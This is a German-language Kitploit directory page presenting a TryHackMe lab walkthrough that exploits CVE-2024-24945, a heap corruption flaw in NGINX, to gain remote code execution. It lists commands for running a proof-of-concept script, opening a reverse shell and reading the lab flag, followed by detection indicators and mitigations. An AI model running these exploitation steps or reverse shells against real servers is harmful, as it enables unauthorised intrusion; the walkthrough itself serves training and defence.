Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough — Dieses Labor demonstriert die Ausnutzung von CVE-2024-24945, einer Heap-Korruptionsschwachstelle, die NGINX betrifft. Das Ziel war zu verstehen, wie Speicherkorruption zu Remote-Code-Ausführung (RCE) führen kann und praktische Erfahrung in Exploitation, Erkennung und Schadensbegrenzung zu sammeln. | Kitploit
Tools/GitHubGitHub/benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungBinary-ExploitationLabs & Praxis
GitHub
benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

Repository anzeigen
4vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Dieses Labor demonstriert die Ausnutzung von CVE-2024-24945, einer Heap-Korruptionsschwachstelle, die NGINX betrifft. Das Ziel war zu verstehen, wie Speicherkorruption zu Remote-Code-Ausführung (RCE) führen kann und praktische Erfahrung in Exploitation, Erkennung und Schadensbegrenzung zu sammeln.

Teilen

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

Dieses Labor demonstriert die Ausnutzung von CVE-2024-24945, einer Heap-Korruptions-Schwachstelle, die NGINX betrifft. Ziel war es zu verstehen, wie Speicherkorruption zu Remote Code Execution (RCE) führen kann, und praktische Erfahrungen in Exploitation, Erkennung und Abwehrtechniken zu sammeln.

Ziele

. Den anfälligen NGINX-Dienst überprüfen. . Beliebige Befehle mit dem bereitgestellten Proof of Concept (PoC) ausführen. . Eine Reverse Shell auf dem Zielcontainer erhalten. . Die Herausforderungsflagge abrufen. . Erkennungs- und Abwehrstrategien verstehen.

Laborumgebung

. Plattform: TryHackMe . Zieldienst: NGINX RIFT . Containerisierte Umgebung: Docker . Exploit-Tool: poc.py . Zugriffsmethode: VNC (Virtual Network Computing)

Methodik

  1. Dienstüberprüfung
  2. bestätigt, dass der anfällige Container lief und erreichbar war.
root@kitploit:~
sudo docker ps
curl -s http://127.0.0.1:19321/api/users/42

Backend in Ordnung

  1. Remote Code Execution

Führte den bereitgestellten PoC aus, um die Ausführung beliebiger Befehle zu validieren.

root@kitploit:~
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned

Erfolgreiche Ausführung überprüft:

root@kitploit:~
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned

Ausgabe: hello from depthfirst

Reverse Shell Zugriff

Eine interaktive Shell auf dem Zielcontainer einrichten.

root@kitploit:~
python3 poc.py --shell

Erfolgreiche Verbindung:

[] Warte auf Reverse-Shell auf Port 1337... [] verbunden. $

  1. Flaggenabruf

Auf die Herausforderungsflagge zugegriffen.

root@kitploit:~
cat /flag.txt

Flagge:

THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}

Erkennungsmöglichkeiten

Verteidiger können Ausnutzungsversuche identifizieren durch:

. NGINX-Worker-Abstürze . Segmentation-Fault-Ereignisse . Unerwartete ausgehende Netzwerkverbindungen . Verdächtige Shell-Prozesse (/bin/sh,bash) . Unbefugte Dateierstellung in temporären Verzeichnissen

Abwehrstrategien

. Aktualisierung auf eine gepatchte NGINX-Version. . Anwendung des Prinzips der minimalen Rechte . . Einschränkung unnötigen ausgehenden Netzwerkverkehrs Implementieren Sie kontinuierliches Log-Monitoring. . Verwenden Sie Container-Sicherheitskontrollen und Laufzeitüberwachung

Wesentliche Erkenntnisse

Dieses Labor bot praktische Erfahrungen in:

. Verständnis von Heap-Korruptions-Schwachstellen. . Ausnutzung von Remote-Code-Execution-Fehlern. . Einrichtung von Reverse Shells. . Durchführung von Post-Exploitation-Validierung. . Erkennung von Kompromittierungsindikatoren und Abwehrtechniken.

Haftungsausschluss

Diese Übung wurde in einer kontrollierten TryHackMe-Laborumgebung durchgeführt nur für Bildungs- und defensive Cybersicherheitstrainingszwecke.

Autor: [Benedict Ejepu Amaechi] Plattform: TryHackMe Thema: CVE-2024-24945 NGINX RIFT Exploitation und Verteidigung Datum der Fertigstellung: Juni 2026

Tool herunterladen